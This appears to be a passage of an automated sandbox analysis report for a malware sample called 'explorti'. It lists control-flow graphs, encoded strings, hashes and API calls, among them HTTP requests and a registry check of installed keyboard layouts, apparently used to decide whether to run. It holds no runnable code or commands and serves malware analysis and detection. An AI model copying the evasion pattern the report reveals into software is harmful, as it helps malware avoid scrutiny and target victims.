                                                                  • String ID: UfNm$Ux1MTw==$aAJTaDE6OpZ=$aAJTazgvOn==$invalid stoi argument$stoi argument out of range$3b
                                                                  • API String ID: 688256393-821754478
                                                                  • Opcode ID: 5101538cca5af8196a482f4da3848708d9b742f550135888ded4676ad4561e4d
                                                                  • Instruction ID: 0b1794c4e9d025e45f6bf11404d483934c45ec933dbc1d3c592cd090db94d1db
                                                                  • Opcode Fuzzy Hash: 5101538cca5af8196a482f4da3848708d9b742f550135888ded4676ad4561e4d
                                                                  • Instruction Fuzzy Hash: A4B1B0B1A001189FEB24CE68CC89BAEBF79FF85304F5041ADF50997292D7759AC0CB95

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 915 5ce410-5ce959 call 5d7840 call 5c5b00 call 5d7840 call 5c5b00 call 5d9180 call 5d8160 call 5d8060 call 5d8160 call 5d7840 * 3 call 5cbd30 call 5d7840 * 2 call 5c5b00 call 5c8490 960 5ce95b-5ce967 915->960 961 5ce983-5ce99d call 5dcef4 915->961 963 5ce979-5ce980 call 5dd569 960->963 964 5ce969-5ce977 960->964 963->961 964->963 966 5ce9a3-5cec77 call 5f6b7a call 5d7840 call 5c5b00 call 5d8200 call 5d8060 call 5d7840 call 5c5b00 call 5d8200 call 5d8060 964->966 996 5cec7d-5ced59 966->996 1001 5cf49b-5cf54c call 5d7f00 996->1001 1002 5cf153-5cf16b 996->1002 1001->1002 1006 5cf579-5cf580 call 5dd569 1001->1006 1003 5cf171-5cf17d 1002->1003 1004 5cf583-5cf596 1002->1004 1003->1006 1007 5cf183-5cf191 1003->1007 1006->1004 1007->1001 1009 5cf5ab-5cf842 call 5f6b7a call 5d7840 call 5c5b00 call 5d7840 * 4 call 5ce410 call 5d7f00 call 5d7840 call 5d7f00 * 2 1007->1009 1044 5cf86c-5cf885 call 5dcef4 1009->1044 1045 5cf844-5cf850 1009->1045 1046 5cf862-5cf869 call 5dd569 1045->1046 1047 5cf852-5cf860 1045->1047 1046->1044 1047->1046 1049 5cf88b-5cf9f5 call 5f6b7a call 5d7840 call 5c5b00 call 5d7840 * 4 call 5ce410 1047->1049 1073 5cfa1f-5cfa2e 1049->1073 1074 5cf9f7-5cfa03 1049->1074 1075 5cfa15-5cfa1c call 5dd569 1074->1075 1076 5cfa05-5cfa13 1074->1076 1075->1073 1076->1075 1077 5cfa2f-5cfb4f call 5f6b7a call 5d7840 call 5c9490 call 5c9140 call 5d8160 1076->1077 1092 5cfb50-5cfb55 1077->1092 1092->1092 1093 5cfb57-5d0740 call 5d7f00 call 5d7840 * 2 call 5cc250 call 5f6639 call 5d7840 call 5c5b00 call 5d7840 * 4 call 5ce410 1092->1093 1127 5d076a-5d0785 call 5dcef4 1093->1127 1128 5d0742-5d074e 1093->1128 1129 5d0760-5d0767 call 5dd569 1128->1129 1130 5d0750-5d075e 1128->1130 1129->1127 1130->1129 1132 5d07ae-5d146c call 5f6b7a call 5d7840 call 5c5b00 call 5d7840 * 4 call 5ce410 1130->1132
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.4092705885.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true
                                                                  • Associated: 00000003.00000002.4092626649.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4092705885.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093024357.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000007A4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.0000000000880000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008AC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095186859.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095868978.0000000000A54000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095897445.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5c0000_explorti.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 111$246122658369$4dd39d$JgNn9TI9$PJ==$PzE+$Xt==$ZMs=$ZMw=$Zww=$3b
                                                                  • API String ID: 0-2682959001
                                                                  • Opcode ID: edf7d8f3e35d0f85378dfb5628142a1c4c195d676347d46aa42c1819666467f8
                                                                  • Instruction ID: 8139b6a3e0525dad6912ffd523c8f929f53e731fc82302d370af1faceac36f87
                                                                  • Opcode Fuzzy Hash: edf7d8f3e35d0f85378dfb5628142a1c4c195d676347d46aa42c1819666467f8
                                                                  • Instruction Fuzzy Hash: 8382C370904289DFEF24DF68C94ABDE7FB6BB45304F50419AE804673C2D7B59A84CB92
                                                                  APIs
                                                                  • ___std_exception_copy.LIBVCRUNTIME ref: 005C23BE
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.4092705885.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true
                                                                  • Associated: 00000003.00000002.4092626649.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4092705885.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093024357.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000007A4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.0000000000880000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008AC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095186859.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095868978.0000000000A54000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095897445.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5c0000_explorti.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ___std_exception_copy
                                                                  • String ID:
                                                                  • API String ID: 2659868963-0
                                                                  • Opcode ID: 4ce409499daa6abd62bf42b0c3460a91ec3bade7c615d95cc36a2e4cbfa99c9c
                                                                  • Instruction ID: 41da2d474bb49dce7f68fcf876a518ae6824359cf3c6eb0cd11d3eabb73e2125
                                                                  • Opcode Fuzzy Hash: 4ce409499daa6abd62bf42b0c3460a91ec3bade7c615d95cc36a2e4cbfa99c9c
                                                                  • Instruction Fuzzy Hash: DE519DB1D00A069BDB35CF59D885BAEBBF6FB48320F24852BD815EB394D3359941CB60
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.4092705885.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true
                                                                  • Associated: 00000003.00000002.4092626649.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4092705885.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093024357.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000007A4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.0000000000880000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008AC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095186859.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095868978.0000000000A54000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095897445.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5c0000_explorti.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequest
                                                                  • String ID: 246122658369$4dd39d$Ip==$NvWsKw==$PzE+$PzI+$YQAZ$YQQZ$YfcZ$ZzSZ$aPIZ$bAQZ$bV5Z$bWEZ$cVIZ$cWI2as==$ccS=$czEZ$dPWZ$dgEZ$stoi argument out of range
                                                                  • API String ID: 3545240790-2107594612
                                                                  • Opcode ID: f6bf97f890d6669f48dd6f1e256c074d4e21f8ec0a11c215bbe402cb248fff56
                                                                  • Instruction ID: 4d78613843ec114f44855c96c0741e0eb3349c655560a66bd1b2572dcebd8fed
                                                                  • Opcode Fuzzy Hash: f6bf97f890d6669f48dd6f1e256c074d4e21f8ec0a11c215bbe402cb248fff56
                                                                  • Instruction Fuzzy Hash: 09232471A002588BEB29DB2CCD8979DBF76AB91304F5081DAE048A73C2EB755F84CF51

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1163 5c5dd0-5c5ece 1169 5c5ef8-5c5f05 call 5dcef4 1163->1169 1170 5c5ed0-5c5edc 1163->1170 1171 5c5eee-5c5ef5 call 5dd569 1170->1171 1172 5c5ede-5c5eec 1170->1172 1171->1169 1172->1171 1174 5c5f06-5c608d call 5f6b7a call 5de060 call 5d7f00 * 5 RegOpenKeyExA 1172->1174 1192 5c6458-5c6461 1174->1192 1193 5c6093-5c6123 call 5f4000 1174->1193 1194 5c648e-5c6497 1192->1194 1195 5c6463-5c646e 1192->1195 1217 5c6129-5c612d 1193->1217 1218 5c6446-5c6452 1193->1218 1199 5c6499-5c64a4 1194->1199 1200 5c64c4-5c64cd 1194->1200 1197 5c6484-5c648b call 5dd569 1195->1197 1198 5c6470-5c647e 1195->1198 1197->1194 1198->1197 1204 5c657e-5c6583 call 5f6b7a 1198->1204 1206 5c64ba-5c64c1 call 5dd569 1199->1206 1207 5c64a6-5c64b4 1199->1207 1202 5c64cf-5c64da 1200->1202 1203 5c64fa-5c6503 1200->1203 1209 5c64dc-5c64ea 1202->1209 1210 5c64f0-5c64f7 call 5dd569 1202->1210 1212 5c652c-5c6535 1203->1212 1213 5c6505-5c6510 1203->1213 1206->1200 1207->1204 1207->1206 1209->1204 1209->1210 1210->1203 1223 5c6537-5c6546 1212->1223 1224 5c6562-5c657d call 5dcef4 1212->1224 1221 5c6522-5c6529 call 5dd569 1213->1221 1222 5c6512-5c6520 1213->1222 1225 5c6440 1217->1225 1226 5c6133-5c6167 RegEnumValueW 1217->1226 1218->1192 1221->1212 1222->1204 1222->1221 1230 5c6558-5c655f call 5dd569 1223->1230 1231 5c6548-5c6556 1223->1231 1225->1218 1233 5c642d-5c6434 1226->1233 1234 5c616d-5c618d 1226->1234 1230->1224 1231->1204 1231->1230 1233->1226 1238 5c643a 1233->1238 1240 5c6190-5c6199 1234->1240 1238->1225 1240->1240 1241 5c619b-5c622d call 5d7c20 call 5d8350 call 5d7840 * 2 call 5c5c40 1240->1241 1241->1233
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.4092705885.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true
                                                                  • Associated: 00000003.00000002.4092626649.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4092705885.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093024357.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000007A4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.0000000000880000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008AC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095186859.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095868978.0000000000A54000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095897445.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5c0000_explorti.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                                  • API String ID: 0-3963862150
                                                                  • Opcode ID: d8dc0e28518e30deebdf4cd0674cabed1d778a9f2687779bb346517a3eae219c
                                                                  • Instruction ID: 672c264f7d4c3d6046d28e4fdb4f864b6d47c6466ad00482fb1dba09512820aa
                                                                  • Opcode Fuzzy Hash: d8dc0e28518e30deebdf4cd0674cabed1d778a9f2687779bb346517a3eae219c
                                                                  • Instruction Fuzzy Hash: AAE17C71900219AFDB28DBA8CC8DBDEBB79BB04304F5042D9E509A7292DB749BC4CF51

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1251 5c7ce0-5c7d62 call 5f4000 1255 5c825e-5c827b call 5dcef4 1251->1255 1256 5c7d68-5c7d90 call 5d7840 call 5c5b00 1251->1256 1263 5c7d94-5c7db6 call 5d7840 call 5c5b00 1256->1263 1264 5c7d92 1256->1264 1269 5c7db8 1263->1269 1270 5c7dba-5c7dd3 1263->1270 1264->1263 1269->1270 1273 5c7e04-5c7e2f 1270->1273 1274 5c7dd5-5c7de4 1270->1274 1277 5c7e60-5c7e81 1273->1277 1278 5c7e31-5c7e40 1273->1278 1275 5c7dfa-5c7e01 call 5dd569 1274->1275 1276 5c7de6-5c7df4 1274->1276 1275->1273 1276->1275 1279 5c827c call 5f6b7a 1276->1279 1283 5c7e87-5c7e8c 1277->1283 1284 5c7e83-5c7e85 GetNativeSystemInfo 1277->1284 1281 5c7e56-5c7e5d call 5dd569 1278->1281 1282 5c7e42-5c7e50 1278->1282 1292 5c8281-5c8286 call 5f6b7a 1279->1292 1281->1277 1282->1279 1282->1281 1288 5c7e8d-5c7e96 1283->1288 1284->1288 1290 5c7e98-5c7e9f 1288->1290 1291 5c7eb4-5c7eb7 1288->1291 1294 5c8259 1290->1294 1295 5c7ea5-5c7eaf 1290->1295 1296 5c7ebd-5c7ec6 1291->1296 1297 5c81ff-5c8202 1291->1297 1294->1255 1299 5c8254 1295->1299 1300 5c7ec8-5c7ed4 1296->1300 1301 5c7ed9-5c7edc 1296->1301 1297->1294 1302 5c8204-5c820d 1297->1302 1299->1294 1300->1299 1304 5c81dc-5c81de 1301->1304 1305 5c7ee2-5c7ee9 1301->1305 1306 5c820f-5c8213 1302->1306 1307 5c8234-5c8237 1302->1307 1308 5c81ec-5c81ef 1304->1308 1309 5c81e0-5c81ea 1304->1309 1310 5c7eef-5c7f4b call 5d7840 call 5c5b00 call 5d7840 call 5c5b00 call 5c5c40 1305->1310 1311 5c7fc9-5c81c5 call 5d7840 call 5c5b00 call 5d7840 call 5c5b00 call 5c5c40 call 5d7840 call 5c5b00 call 5c5620 call 5d7840 call 5c5b00 call 5d7840 call 5c5b00 call 5c5c40 call 5d7840 call 5c5b00 call 5c5620 call 5d7840 call 5c5b00 call 5d7840 call 5c5b00 call 5c5c40 call 5d7840 call 5c5b00 call 5c5620 1305->1311 1312 5c8228-5c8232 1306->1312 1313 5c8215-5c821a 1306->1313 1314 5c8239-5c8243 1307->1314 1315 5c8245-5c8251 1307->1315 1308->1294 1317 5c81f1-5c81fd 1308->1317 1309->1299 1336 5c7f50-5c7f57 1310->1336 1351 5c81cb-5c81d4 1311->1351 1312->1294 1313->1312 1319 5c821c-5c8226 1313->1319 1314->1294 1315->1299 1317->1299 1319->1294 1338 5c7f59 1336->1338 1339 5c7f5b-5c7f7b call 5f8a61 1336->1339 1338->1339 1345 5c7f7d-5c7f8c 1339->1345 1346 5c7fb2-5c7fb4 1339->1346 1348 5c7f8e-5c7f9c 1345->1348 1349 5c7fa2-5c7faf call 5dd569 1345->1349 1350 5c7fba-5c7fc4 1346->1350 1346->1351 1348->1292 1348->1349 1349->1346 1350->1351 1351->1297 1354 5c81d6 1351->1354 1354->1304
                                                                  APIs
                                                                  • GetNativeSystemInfo.KERNELBASE(?), ref: 005C7E83
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.4092705885.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true
                                                                  • Associated: 00000003.00000002.4092626649.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4092705885.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093024357.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000007A4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.0000000000880000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008AC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095186859.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095868978.0000000000A54000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095897445.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5c0000_explorti.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: InfoNativeSystem
                                                                  • String ID: McsqLc==$McsqMM==$McsrKc==
                                                                  • API String ID: 1721193555-2014272013
                                                                  • Opcode ID: 7e4680cf0f7b16eaab625de63244bbc29c2726da0269f2449590613128e25042
                                                                  • Instruction ID: 3b112427da73f5976de21b8c54616ad738ad320c99a0a275b283e4f4392d5316
                                                                  • Opcode Fuzzy Hash: 7e4680cf0f7b16eaab625de63244bbc29c2726da0269f2449590613128e25042
                                                                  • Instruction Fuzzy Hash: 28D12970E005599FDB24BBA8DC5EBAD7E62BB85314F90428DE405673C2EB745E84CBC2

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1389 5f6de1-5f6e16 GetFileType 1390 5f6ece-5f6ed1 1389->1390 1391 5f6e1c-5f6e27 1389->1391 1392 5f6efa-5f6f22 1390->1392 1393 5f6ed3-5f6ed6 1390->1393 1394 5f6e49-5f6e65 call 5f4000 GetFileInformationByHandle 1391->1394 1395 5f6e29-5f6e3a call 5f7157 1391->1395 1399 5f6f3f-5f6f41 1392->1399 1400 5f6f24-5f6f37 1392->1400 1393->1392 1397 5f6ed8-5f6eda 1393->1397 1404 5f6eeb-5f6ef8 call 5f73ed 1394->1404 1411 5f6e6b-5f6ead call 5f70a9 call 5f6f51 * 3 1394->1411 1407 5f6ee7-5f6ee9 1395->1407 1408 5f6e40-5f6e47 1395->1408 1403 5f6edc-5f6ee1 call 5f7423 1397->1403 1397->1404 1402 5f6f42-5f6f50 call 5dcef4 1399->1402 1400->1399 1412 5f6f39-5f6f3c 1400->1412 1403->1407 1404->1407 1407->1402 1408->1394 1425 5f6eb2-5f6eca call 5f7076 1411->1425 1412->1399 1425->1399 1428 5f6ecc 1425->1428 1428->1407
                                                                  APIs
                                                                  • GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 005F6E03
                                                                  • GetFileInformationByHandle.KERNELBASE(?,?), ref: 005F6E5D
                                                                  • __dosmaperr.LIBCMT ref: 005F6EF2
                                                                    • Part of subcall function 005F7157: __dosmaperr.LIBCMT ref: 005F718C
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.4092705885.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true
                                                                  • Associated: 00000003.00000002.4092626649.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4092705885.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093024357.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000007A4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.0000000000880000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008AC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095186859.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095868978.0000000000A54000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095897445.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5c0000_explorti.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: File__dosmaperr$HandleInformationType
                                                                  • String ID:
                                                                  • API String ID: 2531987475-0
                                                                  • Opcode ID: 767c11de0c200d6a9611d66a6983ba6be89b2ff03f26264b41e762e0cabab824
                                                                  • Instruction ID: c303ff80f682456e07c578430f597466a449bb1784d62e5874161d1486c1f168
                                                                  • Opcode Fuzzy Hash: 767c11de0c200d6a9611d66a6983ba6be89b2ff03f26264b41e762e0cabab824
                                                                  • Instruction Fuzzy Hash: 9F414E76900649ABDF28EF65D8499BBBBF9FF89300B10442DF656D3610DB34D804CB20

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1606 5f6c79-5f6c85 1607 5f6c87-5f6ca3 call 5f7410 call 5f7423 call 5f6b6a 1606->1607 1608 5f6ca4-5f6cc8 call 5f4000 1606->1608 1614 5f6cca-5f6ce4 call 5f7410 call 5f7423 call 5f6b6a 1608->1614 1615 5f6ce6-5f6d08 CreateFileW 1608->1615 1637 5f6d52-5f6d56 1614->1637 1616 5f6d0a-5f6d0e call 5f6de1 1615->1616 1617 5f6d18-5f6d1f call 5f6d57 1615->1617 1625 5f6d13-5f6d16 1616->1625 1629 5f6d20-5f6d22 1617->1629 1625->1629 1631 5f6d44-5f6d47 1629->1631 1632 5f6d24-5f6d41 call 5f4000 1629->1632 1633 5f6d49-5f6d4f FindCloseChangeNotification 1631->1633 1634 5f6d50 1631->1634 1632->1631 1633->1634 1634->1637
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.4092705885.00000000005C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 005C0000, based on PE: true
                                                                  • Associated: 00000003.00000002.4092626649.00000000005C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4092705885.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093024357.0000000000629000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.000000000062B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000007A4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.0000000000880000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008AC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4093184029.00000000008C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095186859.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095868978.0000000000A54000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000003.00000002.4095897445.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5c0000_explorti.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c7c8f43023eeacb85514238910b8896073365319c152dfd552589e3093efb4c8
                                                                  • Instruction ID: c333c618aa114484b9d9c266fd7109b877eb615804ed9605c4abbc2eb124a171
                                                                  • Opcode Fuzzy Hash: c7c8f43023eeacb85514238910b8896073365319c152dfd552589e3093efb4c8
                                                                  • Instruction Fuzzy Hash: D821C731A0410D6AEF116B689C49BBE3F29BF81378F200354FA646B1D1DA789D0596A1

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1639 5fd4d4-5fd4f5 call 5dde90 1642 5fd50f-5fd512 1639->1642 1643 5fd4f7 1639->1643 1644 5fd52e-5fd53a call 5fa668 1642->1644 1645 5fd514-5fd517 1642->1645 1643->1644 1646 5fd4f9-5fd4ff 1643->1646 1659 5fd53c-5fd53f 1644->1659 1660 5fd544-5fd550 call 5fd45e 1644->1660 1647 5fd523-5fd52c call 5fd41c 1645->1647 1649 5fd519-5fd51c 1645->1649 1646->1647 1648 5fd501-5fd505 1646->1648 1662 5fd56c-5fd575 1647->1662 1648->1644 1651 5fd507-5fd50b 1648->1651 1652 5fd51e-5fd521 1649->1652 1653 5fd552-5fd562 call 5f7423 call 5f6b6a 1649->1653 1651->1653 1656 5fd50d 1651->1656 1652->1647 1652->1653 1653->1659 1656->1647 1663 5fd6ab-5fd6ba 1659->1663 1660->1653 1669 5fd564-5fd569 1660->1669 1667 5fd577-5fd57f call 5f8c6b 1662->1667 1668 5fd582-5fd593 1662->1668 1667->1668 1672 5fd5a9 1668->1672 1673 5fd595-5fd5a7 1668->1673 1669->1662 1675 5fd5ab-5fd5bc 1672->1675 1673->1675 1676 5fd5be-5fd5c0 1675->1676 1677 5fd62a-5fd63a call 5fd667 1675->1677 1678 5fd6bb-5fd6bd 1676->1678 1679 5fd5c6-5fd5c8 1676->1679 1686 5fd63c-5fd63e 1677->1686 1687 5fd6a9 1677->1687 1684 5fd6bf-5fd6c6 call 5f8cb3 1678->1684 1685 5fd6c7-5fd6da call 5f64fd 1678->1685 1682 5fd5ca-5fd5cd 1679->1682 1683 5fd5d4-5fd5e0 1679->1683 1682->1683 1688 5fd5cf-5fd5d2 1682->1688 1689 5fd5e2-5fd5f7 call 5fd4cb * 2 1683->1689 1690 5fd620-5fd628 1683->1690 1684->1685 1707 5fd6dc-5fd6e6 1685->1707 1708 5fd6e8-5fd6ee 1685->1708 1693 5fd679-5fd682 1686->1693 1694 5fd640-5fd656 call 5fa511 1686->1694 1687->1663 1688->1683 1695 5fd5fa-5fd5fc 1688->1695 1689->1695 1690->1677 1718 5fd685-5fd688 1693->1718 1694->1718 1695->1690 1701 5fd5fe-5fd60e 1695->1701 1706 5fd610-5fd615 1701->1706 1706->1677 1712 5fd617-5fd61e 1706->1712 1707->1708 1713 5fd71c-5fd727 call 5f7423 1707->1713 1709 5fd707-5fd718 RtlAllocateHeap 1708->1709 1710 